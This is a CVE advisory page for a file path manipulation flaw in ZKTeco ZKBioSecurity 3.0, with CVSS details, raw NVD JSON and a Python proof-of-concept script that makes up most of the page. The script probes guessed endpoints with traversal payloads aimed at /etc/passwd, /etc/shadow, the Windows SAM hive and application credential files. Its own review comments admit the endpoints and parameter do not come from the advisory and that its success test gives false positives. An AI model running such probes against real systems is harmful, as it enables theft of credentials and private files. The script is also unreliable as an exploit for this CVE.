Security Vulnerability Report
CVE-2016-20029 CVSS 6.2 MEDIUM

CVE-2016-20029

Published: 2026-03-16 14:17:50
Last Modified: 2026-04-15 14:56:46

Description

ZKTeco ZKBioSecurity 3.0 contains a file path manipulation vulnerability that allows attackers to access arbitrary files by modifying file paths used to retrieve local resources. Attackers can manipulate path parameters to bypass access controls and retrieve sensitive information including configuration files, source code, and protected application resources.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKBioSecurity 3.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
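#!/usr/bin/env python3
"""
CVE-2016-20029 - ZKTeco ZKBioSecurity 3.0 File Path Manipulation PoC
Author: Security Researcher
Reference: https://www.exploit-db.com/exploits/40326/

NOTE(review): the CVE record published with this script scores the issue as
local (CVSS:3.1 AV:L) and classifies it as CWE-276, whereas this script sends
HTTP requests to generic endpoint names with a ``file`` query parameter.
Neither the endpoints nor the parameter name appear in that record, so they
look like guesses rather than something taken from the advisory. Read any
"VULNERABLE" line printed below as "needs manual confirmation", not as proof.
"""

import requests
import sys

# Placeholder host used when no target is given on the command line.
TARGET_HOST = "http://target-zkbiosecurity.com"


def test_file_path_traversal(target):
    """Probe *target* with relative-path values and report the first match.

    Every endpoint in the built-in list is requested once per candidate path,
    passing the path in the ``file`` query parameter.

    Args:
        target: Base URL (scheme and host) that the endpoint is appended to.

    Returns:
        True as soon as one request returns HTTP 200 with a non-empty body
        whose Content-Type contains "text" or "application"; False when no
        request matched.

    NOTE(review): that match condition is also met by an ordinary HTML login
    or error page served with status 200, so a True result does not by itself
    show that a file outside the web root was returned. Compare the saved
    body with the expected file format before reporting a finding.
    """
    # Common sensitive files to test
    test_files = [
        # Linux targets
        ("../../../../etc/passwd", "passwd_file"),
        ("../../../../etc/shadow", "shadow_file"),
        ("../../../../../../etc/passwd", "passwd_deep"),
        # Windows targets. Raw strings keep the backslashes literal; the
        # values are the same as before, without the invalid-escape warning
        # that newer Python versions raise for "\." and "\w".
        (r"..\..\..\..\windows\system32\config\sam", "windows_sam"),
        (r"..\..\..\..\windows\win.ini", "windows_ini"),
        # Application specific files
        ("../../config/database.conf", "db_config"),
        ("../../app/config.xml", "app_config"),
        ("../../../../ZKBioSecurity/config/credential.dat", "zk_creds"),
    ]

    # Common vulnerable endpoints
    endpoints = [
        "/download",
        "/file/download",
        "/resource/get",
        "/log/view",
        "/report/export",
        "/api/file",
    ]

    print(f"[*] Testing {target} for CVE-2016-20029")
    print(f"[*] Target: {target}")
    print("=" * 60)

    for endpoint in endpoints:
        for file_path, description in test_files:
            try:
                # Test with 'file' parameter
                url = f"{target}{endpoint}"
                params = {"file": file_path}

                print(f"\n[~] Testing: {endpoint} with {description}")
                print(f"[~] Parameter: file={file_path}")

                # NOTE(review): verify=False turns off TLS certificate
                # validation, so the responding server is not authenticated
                # and requests will emit an InsecureRequestWarning.
                response = requests.get(url, params=params, timeout=10, verify=False)

                if response.status_code == 200:
                    content_type = response.headers.get("Content-Type", "")
                    looks_like_content = (
                        "text" in content_type or "application" in content_type
                    )
                    if looks_like_content and len(response.content) > 0:
                        print(f"[!] VULNERABLE! Received {len(response.content)} bytes")
                        print(f"[+] Content preview: {response.text[:200]}...")

                        # Save to file. The body may hold whatever the server
                        # returned, so treat the output file as sensitive.
                        # An explicit encoding avoids a platform-dependent
                        # UnicodeEncodeError on non-ASCII response text.
                        filename = f"poc_output_{description}.txt"
                        with open(filename, "w", encoding="utf-8") as f:
                            f.write(response.text)
                        print(f"[+] Saved response to {filename}")
                        return True
                elif response.status_code == 403:
                    print("[-] Access denied (403)")
                else:
                    print(f"[-] Status code: {response.status_code}")

            except requests.exceptions.RequestException as e:
                # Network or protocol failure for this probe; continue with
                # the next combination.
                print(f"[!] Error: {e}")

    print("\n[*] Testing complete")
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_HOST
        print(f"[*] No target specified, using default: {target}")

    test_file_path_traversal(target)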

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20029", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:49.527", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains a file path manipulation vulnerability that allows attackers to access arbitrary files by modifying file paths used to retrieve local resources. Attackers can manipulate path parameters to bypass access controls and retrieve sensitive information including configuration files, source code, and protected application resources."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene una vulnerabilidad de manipulación de rutas de archivo que permite a los atacantes acceder a archivos arbitrarios modificando las rutas de archivo utilizadas para recuperar recursos locales. Los atacantes pueden manipular los parámetros de ruta para eludir los controles de acceso y recuperar información sensible, incluyendo archivos de configuración, código fuente y recursos de aplicación protegidos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016090001", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116489", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138570", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40326/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-file-path-manipulation-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php", "source": "[email protected]"}]}}